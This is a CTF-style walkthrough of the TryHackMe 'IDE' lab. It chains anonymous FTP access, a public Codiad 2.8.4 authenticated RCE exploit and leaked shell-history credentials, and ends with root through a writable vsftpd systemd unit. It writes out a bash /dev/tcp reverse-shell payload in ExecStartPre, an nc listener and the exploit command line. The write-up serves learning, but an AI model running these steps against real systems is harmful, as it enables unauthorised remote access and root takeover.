بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ

In the name of ALLAH, the most Gracious, the most Merciful .

Hello world, Amrou is here! I'm back with another walkthrough. Before we dive into the write-up, I highly encourage you to give the lab a complete try on your own first. Learning from your mistakes along the way is the best way to grow. But if you're ready to see how it's done, LET'S GO!

None

1) Reconnaissance

Let's kick things off with an Nmap scan to see what ports are open:

nmap -v -p- <ip-address>
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
62337/tcp open  unknown
nmap -v -sCV -p <open-ports> <ip-address> -oN scan.nmap
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
...
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
...
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
...
62337/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
...

Looking at the FTP server, we saw that it accepts anonymous logins. We logged in and we found a hidden "…" directory so we "cd" to it :

None

We found a file named '-' there, so we downloaded it to our local machine using the command: get -

then we change its name like follow :

None

We found some credentials, so we made a note of them for later.

2) Foothold :

Looking at the first apache server on port 80,we can see it only hosts a default static web page.

So we head toward the second server on port 62337 :

None

and we found a codiad login form, so we try the credentials that we found above :

None

And it did work !!

As shown in the above picture, we are using Codiad version 2.8.4. Some searches revealed that this version is vulnerable to remote code execution (RCE).

So download the following exploit into our local machine :

OffSec's Exploit Database Archive

Codiad 2.8.4 - Remote Code Execution (Authenticated). CVE-2018-14009 . webapps exploit for Multiple platform

exploit-db.com

Then we run it as follow :

None
python3 exploit http://<machine-ip>:62337/ john password <your-tun0-ip> <your-port> linux

As instructed above, we should run these two different commands in different tabs then press Y to continue :

None
None

And we got our reverse shell !!

How it works under the hood : Codiad version 2.8.4 suffers from an authenticated Remote Code Execution (RCE) vulnerability due to improper input validation in its search component. By passing crafted commands through the search parameters, an attacker with valid credentials can trick the application into executing arbitrary system commands.

None

I tried to cat the user flag but it seems that we don't have permission to do so .

So I tried to cat the .bash_history file :

None

and we got drac credentials !!

We su as drac :

None

Then :

None

We got the user flag !!

3) Privilege escalation :

We start by listing our SUDO privileges using : sudo -l

None

And as we can see we're able to run service vsftpd restart as root .

Making some search on how can we harness that command resulted in this article:

Sudo Service Privilege Escalation | OffSec Wiki

The service command is vulnerable to privilege escalation if we can execute as root.

pentest.tools

First off, find the service config file for vsftpd using :

find / -name "*vsftpd*"

We found the location as below :

/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service

I checked my privileges over the vsftpd config files and found that we have write permission on second one .

All that remains is to add our payload to the file :

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target

Then we need to reload the daemon.

systemctl daemon-reload

In local machine, start listener for getting a shell.

nc -lvnp 4444

Now execute the command which can be executed with sudo.

sudo /usr/sbin/service vsftpd restart
None

And we got our reverse shell !!

But how it works: Systemd .service files control how background services run. By adding the ExecStartPre directive, we are telling the system to execute our reverse shell payload with root privileges immediately before it attempts to start the actual FTP service.

None

That's it for the root flag also !!

That's it for today guys I hope you enjoy the walkthrough and learn from it, and until next time Asalamo alaikom .

References:

The lab link : https://tryhackme.com/room/ide